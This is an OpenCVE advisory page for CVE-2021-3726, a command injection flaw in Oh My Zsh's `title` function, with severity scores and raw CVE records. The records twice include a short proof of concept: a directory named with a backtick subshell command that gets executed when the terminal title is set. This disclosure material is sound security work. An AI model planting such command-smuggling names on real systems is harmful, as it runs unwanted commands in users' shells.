CVE-2021-3726 - OpenCVE

# Vulnerability in `title` function **Description**: the `title` function defined in `lib/termsupport.zsh` uses `print` to set the terminal title to a user-supplied string. In Oh My Zsh, this function is always used securely, but custom user code could use the `title` function in a way that is unsafe. **Fixed in**: [a263cdac](https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac). **Impacted areas**: - `title` function in `lib/termsupport.zsh`. - Custom user code using the `title` function.

No CVSS v4.0

Attack Vector Network

Attack Complexity High

Privileges Required None

Scope Unchanged

Confidentiality Impact High

Integrity Impact High

Availability Impact High

User Interaction Required

No CVSS v3.0

Access Vector Network

Access Complexity Low

Authentication None

Confidentiality Impact Partial

Integrity Impact Partial

Availability Impact Partial

AV:N/AC:L/Au:N/C:P/I:P/A:P

This CVE is not in the KEV list.

Key SSVC decision points have not yet been added.

Vendors	Products
Planetargon	Oh My Zsh

Configuration 1 [-]

cpe:2.3:a:planetargon:oh_my_zsh:*:*:*:*:*:*:*:*

No data.

References

Link	Providers
https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac

History

No history.

MITRE

Status: PUBLISHED

Assigner: @huntrdev

Published: 2021-11-30T09:30:15

Updated: 2024-08-03T17:01:08.345Z

Reserved: 2021-08-19T00:00:00

Link: CVE-2021-3726

Vulnrichment

No data.

NVD

Status : Analyzed

Published: 2021-11-30T10:15:08.883

Modified: 2021-11-30T20:49:42.140

Link: CVE-2021-3726

Redhat

No data.

{"containers": {"cna": {"affected": [{"product": "ohmyzsh/ohmyzsh", "vendor": "ohmyzsh", "versions": [{"lessThan": "a263cdac", "status": "affected", "version": "unspecified", "versionType": "custom"}]}], "descriptions": [{"lang": "en", "value": "# Vulnerability in `title` function **Description**: the `title` function defined in `lib/termsupport.zsh` uses `print` to set the terminal title to a user-supplied string. In Oh My Zsh, this function is always used securely, but custom user code could use the `title` function in a way that is unsafe. **Fixed in**: [a263cdac](https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac). **Impacted areas**: - `title` function in `lib/termsupport.zsh`. - Custom user code using the `title` function."}], "exploits": [{"lang": "en", "value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Add a custom function that calls `title` to set the terminal title with a user-supplied string.\n For example:\n\n ```sh\n function dirpath_in_title {\n title \"$PWD\"\n }\n add-zsh-hook precmd dirpath_in_title\n ```\n\n3. Create and cd into a directory with a subshell command as its name:\n\n ```sh\n baddir='`echo pwned && id`'\n mkdir \"$baddir\" && cd \"$baddir\"\n ```\n\n4. The `title` function incorrectly expands the subshell command (see screenshot):\n\n ![2 title_function poc](https://user-images.githubusercontent.com/1441704/142874935-341ddd3c-21e8-4b9e-a5c1-77c0b3debacc.png)"}], "metrics": [{"cvssV3_1": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}}], "problemTypes": [{"descriptions": [{"cweId": "CWE-78", "description": "CWE-78 OS Command Injection", "lang": "en", "type": "CWE"}]}], "providerMetadata": {"dateUpdated": "2021-11-30T09:30:15", "orgId": "c09c270a-b464-47c1-9133-acb35b22c19a", "shortName": "@huntrdev"}, "references": [{"tags": ["x_refsource_MISC"], "url": "https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac"}], "title": "OS Command Injection in ohmyzsh/ohmyzsh", "x_legacyV4Record": {"CVE_data_meta": {"ASSIGNER": "security@huntr.dev", "ID": "CVE-2021-3726", "STATE": "PUBLIC", "TITLE": "OS Command Injection in ohmyzsh/ohmyzsh"}, "affects": {"vendor": {"vendor_data": [{"product": {"product_data": [{"product_name": "ohmyzsh/ohmyzsh", "version": {"version_data": [{"version_affected": "<", "version_value": "a263cdac"}]}}]}, "vendor_name": "ohmyzsh"}]}}, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": {"description_data": [{"lang": "eng", "value": "# Vulnerability in `title` function **Description**: the `title` function defined in `lib/termsupport.zsh` uses `print` to set the terminal title to a user-supplied string. In Oh My Zsh, this function is always used securely, but custom user code could use the `title` function in a way that is unsafe. **Fixed in**: [a263cdac](https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac). **Impacted areas**: - `title` function in `lib/termsupport.zsh`. - Custom user code using the `title` function."}]}, "exploit": [{"lang": "en", "value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Add a custom function that calls `title` to set the terminal title with a user-supplied string.\n For example:\n\n ```sh\n function dirpath_in_title {\n title \"$PWD\"\n }\n add-zsh-hook precmd dirpath_in_title\n ```\n\n3. Create and cd into a directory with a subshell command as its name:\n\n ```sh\n baddir='`echo pwned && id`'\n mkdir \"$baddir\" && cd \"$baddir\"\n ```\n\n4. The `title` function incorrectly expands the subshell command (see screenshot):\n\n ![2 title_function poc](https://user-images.githubusercontent.com/1441704/142874935-341ddd3c-21e8-4b9e-a5c1-77c0b3debacc.png)"}], "impact": {"cvss": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}}, "problemtype": {"problemtype_data": [{"description": [{"lang": "eng", "value": "CWE-78 OS Command Injection"}]}]}, "references": {"reference_data": [{"name": "https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac", "refsource": "MISC", "url": "https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac"}]}}}, "adp": [{"providerMetadata": {"orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE", "dateUpdated": "2024-08-03T17:01:08.345Z"}, "title": "CVE Program Container", "references": [{"tags": ["x_refsource_MISC", "x_transferred"], "url": "https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac"}]}]}, "cveMetadata": {"assignerOrgId": "c09c270a-b464-47c1-9133-acb35b22c19a", "assignerShortName": "@huntrdev", "cveId": "CVE-2021-3726", "datePublished": "2021-11-30T09:30:15", "dateReserved": "2021-08-19T00:00:00", "dateUpdated": "2024-08-03T17:01:08.345Z", "state": "PUBLISHED"}, "dataType": "CVE_RECORD", "dataVersion": "5.1"}

{"configurations": [{"nodes": [{"cpeMatch": [{"criteria": "cpe:2.3:a:planetargon:oh_my_zsh:*:*:*:*:*:*:*:*", "matchCriteriaId": "80FD5E81-3E73-4921-925C-E55098EAE4B1", "versionEndExcluding": "2021-11-11", "vulnerable": true}], "negate": false, "operator": "OR"}]}], "cveTags": [], "descriptions": [{"lang": "en", "value": "# Vulnerability in `title` function **Description**: the `title` function defined in `lib/termsupport.zsh` uses `print` to set the terminal title to a user-supplied string. In Oh My Zsh, this function is always used securely, but custom user code could use the `title` function in a way that is unsafe. **Fixed in**: [a263cdac](https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac). **Impacted areas**: - `title` function in `lib/termsupport.zsh`. - Custom user code using the `title` function."}, {"lang": "es", "value": "# Vulnerabilidad en la funci\u00f3n \"title\" **Descripci\u00f3n**: la funci\u00f3n \"title\" definida en \"lib/termsupport.zsh\" usa \"print\" para establecer el t\u00edtulo de la terminal a una cadena proporcionada por el usuario. En Oh My Zsh, esta funci\u00f3n es siempre usada de forma segura, pero el c\u00f3digo de usuario personalizado podr\u00eda usar la funci\u00f3n \"title\" de forma no segura. **Corregido en**: [a263cdac](https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac). **\u00c1reas afectadas**: - Funci\u00f3n \"title\" en \"lib/termsupport.zsh\". - C\u00f3digo de usuario personalizado usando la funci\u00f3n \"title\""}], "id": "CVE-2021-3726", "lastModified": "2021-11-30T20:49:42.140", "metrics": {"cvssMetricV2": [{"acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false}], "cvssMetricV31": [{"cvssData": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary"}, {"cvssData": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.6, "impactScore": 5.9, "source": "security@huntr.dev", "type": "Secondary"}]}, "published": "2021-11-30T10:15:08.883", "references": [{"source": "security@huntr.dev", "tags": ["Patch", "Third Party Advisory"], "url": "https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac"}], "sourceIdentifier": "security@huntr.dev", "vulnStatus": "Analyzed", "weaknesses": [{"description": [{"lang": "en", "value": "CWE-78"}], "source": "security@huntr.dev", "type": "Primary"}]}